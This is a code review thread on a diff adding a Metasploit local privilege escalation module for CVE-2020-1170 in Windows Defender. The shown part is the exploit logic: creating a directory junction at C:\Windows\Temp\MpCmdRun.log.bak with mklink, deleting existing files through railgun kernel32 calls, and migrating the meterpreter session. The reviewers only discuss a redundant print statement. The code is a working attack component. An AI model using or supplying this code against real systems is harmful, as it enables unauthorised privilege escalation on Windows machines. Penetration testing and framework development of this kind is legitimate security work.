modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,174 @@
+    process.pid
+  rescue Rex::Post::Meterpreter::RequestError
+    # Sandboxes could not allow to create a new process
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction
+    print_status('Creating the directory junction...')
+    junction_creation_result = cmd_exec('cmd.exe /C "mklink /J C:\\Windows\\Temp\\MpCmdRun.log.bak C:\\Windows\\Temp\\test"')
+    if junction_creation_result =~ /Junction created/
+      print_good('Junction was successfully created!')
+      return 1
+    elsif junction_creation_result =~ /file already exists/ # If the file already exists on the target...
+      return 2
+    else
+      print_error("Directory junction failed. Error code was (#{junction_creation_result['GetLastError']}): #{junction_creation_result['ErrorMessage']}")
+      return -1
+    end
+  end
+
+  def delete_existing_mpcmdrun_file_or_folder
+    result_file_deletion = client.railgun.kernel32.DeleteFileA('C:\\Windows\\Temp\\MpCmdRun.log.bak') # Then we try to delete it as a file....
+    if result_file_deletion['GetLastError'] != 0 # Aka we failed
+      result_junction_deletion = client.railgun.kernel32.RemoveDirectoryA('C:\\Windows\\Temp\\MpCmdRun.log.bak') # And as a directory junction or folder...
+      if result_junction_deletion['GetLastError'] != 0 # Aka we failed...
+        print_error("Looks like the C:\\Windows\\Temp\\MpCmdRun.log.bak file/folder already exists on this target, and we can't delete it.")
+        print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
+        return false
+      else
+        print_good('Deleted the already existing C:\\Windows\\Temp\\MpCmdRun.log.bak folder on the target successfully!')
+        return true
+      end
+    else
+      print_good('Deleted the already existing C:\\Windows\\Temp\\MpCmdRun.log.bak file on the target successfully!')
+      return true
+    end
+  end
+
+  def exploit
+    junction_creation_result = make_directory_junction
+    case junction_creation_result
+    when -1
+      fail_with(Failure::UnexpectedReply, 'Unable to create the directory junction. Please report this issue on the issue tracker so we can investigate further.')
+    when 2
+      mpcmdrun_deletion_result = delete_existing_mpcmdrun_file_or_folder
+      if !mpcmdrun_deletion_result
+        fail_with(Failure::NoAccess, 'We lack permissions to delete the existing C:\\Windows\\Temp\\MpCmdRun.log.bak file/folder. Try again as an admin.')
+      else
+        if make_directory_junction != 1
+          fail_with(Failure::NoAccess, "Still couldn't create the directory junction after the file was deleted. Can't exploit so exiting...")
+        end
+      end
+    end
+
+    print_good('Junction was successfully created!')
```

Comment:
This print is redundant at this point. It is already printed in `make_directory_junction` and execution will never make it this far if `make_directory_junction` fails.

Reply:
Huh thought I had removed the extra copy inside `make_directory_junction`. I'll remove this one then seeing as we are already printing it out elsewhere.

Reply:
Will be resolved with next commit.